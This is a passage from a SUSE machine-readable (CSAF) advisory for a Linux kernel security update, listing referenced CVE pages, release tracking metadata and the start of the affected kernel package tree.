"category": "self",
"summary": "SUSE CVE CVE-2025-38379 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38379/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38423 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38423/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38505 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38505/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38507 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38507/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38510 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38510/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38511 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38511/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38512 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38512/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38513 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38513/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38515 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38515/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38516 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38516/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38520 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38520/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38521 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38521/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38529 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38529/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38530 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38530/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38535 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38535/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38537 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38537/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38538 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38538/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38539 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38539/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38540 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38540/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38541 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38541/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38543 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38543/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38547 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38547/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38548 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38548/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38550 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38550/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38551 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38551/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38569 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38569/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38589 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38589/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38590 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38590/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38645 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38645/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39689 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39689/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39795 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39795/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39813 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39814 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39814/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39817 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39817/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39829 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39829/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39880 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39880/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39913 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39913/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39927 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39927/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40030 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40030/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40045 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40045/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40097 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40097/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40106 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40106/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40147 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40147/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40195 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40195/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40257 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40257/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40259 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40259/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40261 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40261/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40363 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40363/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68174 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68174/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68178 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68178/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68188 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68188/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68200 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68200/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68211 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68211/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68218 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68218/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68227 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68227/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68241 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68241/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68245 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68245/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68261 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68261/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68296 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68296/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68297 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68297/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68320 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68320/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68325 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68325/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68337 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68337/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68341 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68341/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68348 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68348/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68349 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68349/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68356 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68356/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68359 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68359/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68360 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68360/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68361 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68361/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68366 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68366/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68367 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68367/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68368 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68368/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68372 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68372/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68374 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68374/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68376 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68376/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68379 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68379/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68725 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68725/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68735 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68735/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68741 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68741/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68743 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68743/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68764 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68764/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68768 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68768/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68770 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68770/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68771 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68771/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68773 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68773/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68775 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68775/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68776 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68776/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68777 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68777/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68778 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68778/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68783 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68783/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68784 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68784/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68788 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68788/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68789 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68789/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68792 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68792/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68795 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68795/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68797 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68797/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68798 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68798/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68799 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68799/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68800 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68800/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68801 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68801/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68802 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68802/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68803 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68803/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68804 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68804/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68808 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68808/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68811 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68811/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68813 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68814 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68814/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68815 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68815/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68816 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68816/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68819 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68819/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68820 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68820/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68821 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68821/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68822 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68822/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71064 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71064/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71066 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71066/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71073 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71073/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71076 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71076/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71077 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71077/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71078 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71078/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71079 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71079/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71080 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71080/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71081 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71081/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71082 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71082/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71083 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71083/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71084 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71084/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71085 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71085/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71086 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71086/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71087 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71087/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71088 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71088/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71089 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71089/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71091 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71091/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71093 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71093/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71094 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71094/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71095 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71095/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71097 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71097/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71098 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71098/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71099 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71099/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71100 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71100/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71101 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71101/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71108 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71108/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71111 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71111/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71112 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71112/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71113 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71113/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71114 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71114/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71116 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71116/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71118 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71118/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71119 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71119/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71120 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71120/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71123 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71123/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71126 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71126/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71130 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71130/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71131 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71131/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71132 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71132/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71133 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71133/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71135 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71135/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71136 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71136/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71137 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71137/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71138 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71138/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71141 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71141/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71142 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71142/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71143 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71143/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71145 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71145/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71147 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71147/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71148 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71148/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71149 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71149/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71154 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71154/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71156 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71156/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71157 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71157/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71162 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71162/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71163 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71163/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22976 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22976/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22977 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22977/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22978 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22978/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22981 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22981/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22982 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22982/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22984 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22984/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22985 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22985/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22986 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22986/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22988 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22988/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22989 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22989/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22990 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22990/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22991 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22991/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22992 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22992/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22993 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22993/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22996 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22996/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22997 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22997/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22999 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22999/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23000 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23000/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23001 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23001/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23002 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23002/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23005 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23005/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23006 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23006/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23011 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23011/"
}
],
"title": "Security update for the Linux Kernel",
"tracking": {
"current_release_date": "2026-02-27T11:51:02Z",
"generator": {
"date": "2026-02-27T11:51:02Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:20599-1",
"initial_release_date": "2026-02-27T11:51:02Z",
"revision_history": [
{
"date": "2026-02-27T11:51:02Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "kernel-64kb-6.12.0-160000.26.1.aarch64",
"product": {
"name": "kernel-64kb-6.12.0-160000.26.1.aarch64",
"product_id": "kernel-64kb-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"product": {
"name": "kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"product_id": "kernel-64kb-devel-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"product": {
"name": "kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"product_id": "kernel-64kb-extra-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-azure-6.12.0-160000.26.1.aarch64",
"product": {
"name": "kernel-azure-6.12.0-160000.26.1.aarch64",
"product_id": "kernel-azure-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"product": {
"name": "kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"product_id": "kernel-azure-devel-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"product": {
"name": "kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"product_id": "kernel-azure-extra-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-default-6.12.0-160000.26.1.aarch64",
"product": {
"name": "kernel-default-6.12.0-160000.26.1.aarch64",
"product_id": "kernel-default-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"product": {
"name": "kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"product_id": "kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-default-devel-6.12.0-160000.26.1.aarch64",
"product": {
"name": "kernel-default-devel-6.12.0-160000.26.1.aarch64",
"product_id": "kernel-default-devel-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-default-extra-6.12.0-160000.26.1.aarch64",
"product": {
"name": "kernel-default-extra-6.12.0-160000.26.1.aarch64",
"product_id": "kernel-default-extra-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"product": {
"name": "kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"product_id": "kernel-kvmsmall-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"product": {
"name": "kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"product_id": "kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"product": {
"name": "kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"product_id": "kernel-obs-qa-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-syms-6.12.0-160000.26.1.aarch64",
"product": {
"name": "kernel-syms-6.12.0-160000.26.1.aarch64",
"product_id": "kernel-syms-6.12.0-160000.26.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-devel-6.12.0-160000.26.1.noarch",
"product": {
"name": "kernel-devel-6.12.0-160000.26.1.noarch",
"product_id": "kernel-devel-6.12.0-160000.26.1.noarch"
}
},
{
"category": "product_version",
"name": "kernel-docs-6.12.0-160000.26.1.noarch",
"product": {
"name": "kernel-docs-6.12.0-160000.26.1.noarch",
"product_id": "kernel-docs-6.12.0-160000.26.1.noarch"
